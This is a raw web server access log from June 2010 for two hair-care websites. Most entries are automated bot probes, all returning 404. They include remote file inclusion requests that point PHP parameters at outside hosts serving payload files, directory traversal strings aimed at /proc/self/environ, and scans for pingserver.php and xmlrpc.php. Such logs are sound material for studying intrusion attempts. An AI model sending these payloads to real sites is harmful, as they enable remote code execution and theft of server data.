62.44.73.150 - - [21/Jun/2010:02:00:51 -0700] "GET /logs/access.log/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://board.rampage-ro.com/hooks/.aA/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.73.150 - - [21/Jun/2010:02:00:51 -0700] "GET /PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://board.rampage-ro.com/hooks/.aA/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.73.150 - - [21/Jun/2010:02:00:51 -0700] "GET /logs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://board.rampage-ro.com/hooks/.aA/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.99.17.62 - - [21/Jun/2010:02:00:59 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.99.17.62 - - [21/Jun/2010:02:00:59 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.99.17.62 - - [21/Jun/2010:02:01:00 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:02:01:59 -0700] "GET /logs/access_100426.log%20%20//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:02:01:59 -0700] "GET /logs/access_100419.log%20%20//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:02:02:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14041 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:02:02:29 -0700] "GET /logs/access_100419.log%20%20//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:02:02:29 -0700] "GET /logs/access_100426.log%20%20//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:02:06:12 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:06:12 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:07:41 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:07:41 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:07:41 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:07:44 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:07:44 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:07:44 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
94.75.226.135 - - [21/Jun/2010:02:08:04 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.75.226.135 - - [21/Jun/2010:02:08:10 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.75.226.135 - - [21/Jun/2010:02:08:15 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:02:10:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12907 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:02:10:24 -0700] "GET /logs/access_100531.log//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:02:10:30 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.222.18.143 - - [21/Jun/2010:02:10:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.222.18.143 - - [21/Jun/2010:02:10:30 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:12:54 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:12:54 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:12:54 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
178.208.83.28 - - [21/Jun/2010:02:13:18 -0700] "GET /logs/access_091123.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
178.208.83.28 - - [21/Jun/2010:02:13:18 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
178.208.83.28 - - [21/Jun/2010:02:13:18 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:16:15 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:16:15 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:16:15 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
178.208.83.28 - - [21/Jun/2010:02:16:23 -0700] "GET /logs/access_091123.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:02:16:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5409 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
178.208.83.28 - - [21/Jun/2010:02:16:23 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.208.83.28 - - [21/Jun/2010:02:16:23 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.44.73.150 - - [21/Jun/2010:02:17:46 -0700] "GET /logs/access.log/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://heart-selena.com/gallery/sql/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.73.150 - - [21/Jun/2010:02:17:46 -0700] "GET /PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://heart-selena.com/gallery/sql/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.73.150 - - [21/Jun/2010:02:17:46 -0700] "GET /logs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://heart-selena.com/gallery/sql/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:02:17:48 -0700] "GET /logs/access_100531.log//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:02:17:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13109 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.222.18.143 - - [21/Jun/2010:02:22:01 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:02:22:01 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:02:22:01 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:02:22:05 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.222.18.143 - - [21/Jun/2010:02:22:06 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.222.18.143 - - [21/Jun/2010:02:22:06 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:02:22:17 -0700] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:02:22:17 -0700] "GET /server.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:02:24:22 -0700] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:02:24:22 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:02:24:22 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:02:24:23 -0700] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:02:24:23 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:02:24:23 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:24:56 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:24:57 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:25:01 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:25:11 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:25:13 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:25:13 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:25:16 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:25:19 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:26:50 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:26:54 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:02:29:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13359 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:29:23 -0700] "GET /inurl:pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [21/Jun/2010:02:29:30 -0700] "GET /inurl:pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:02:29:47 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:02:29:47 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:02:29:48 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
209.116.59.107 - - [21/Jun/2010:02:32:41 -0700] "GET /logs/access_100308.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.116.59.107 - - [21/Jun/2010:02:32:41 -0700] "GET /logs/scripts.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.133.114.100 - - [21/Jun/2010:02:33:31 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.133.114.100 - - [21/Jun/2010:02:33:31 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.116.59.107 - - [21/Jun/2010:02:33:51 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.133.114.100 - - [21/Jun/2010:02:34:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.133.114.100 - - [21/Jun/2010:02:34:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:02:37:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18879 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
195.191.40.23 - - [21/Jun/2010:02:37:50 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
195.191.40.23 - - [21/Jun/2010:02:37:50 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:02:38:05 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:38:05 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:38:05 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:02:38:26 -0700] "GET /logs/access.log/server.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:02:38:26 -0700] "GET /server.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:02:38:26 -0700] "GET /logs/server.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:38:31 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:38:31 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:02:38:31 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:38:34 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:38:34 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.4.232.155 - - [21/Jun/2010:02:38:34 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:02:40:49 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.92.165.130 - - [21/Jun/2010:02:43:12 -0700] "GET /index2.php?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:02:43:12 -0700] "GET /logs/access.log%20%20/index2.php?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:02:43:12 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:02:43:14 -0700] "GET /index2.php?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:02:43:14 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:02:43:14 -0700] "GET /logs/access.log%20%20/index2.php?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:02:43:49 -0700] "GET /index2.php?option=com_gcalendar&controller=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:02:43:49 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:02:43:50 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:02:44:16 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:02:44:23 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:02:44:44 -0700] "GET /index2.php?option=com_gcalendar&controller=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:02:44:44 -0700] "GET /logs/access.log%20%20/index2.php?option=com_gcalendar&controller=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:02:44:44 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.103.254.153 - - [21/Jun/2010:02:45:30 -0700] "GET /logs/access.log/xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:02:45:30 -0700] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.103.254.153 - - [21/Jun/2010:02:45:31 -0700] "GET /logs/xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:45:59 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:45:59 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:45:59 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:45:59 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:45:59 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:45:59 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:46:11 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:46:11 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:02:46:11 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:02:48:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13528 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:02:48:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=19436 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
211.53.209.67 - - [21/Jun/2010:02:50:20 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [21/Jun/2010:02:50:27 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
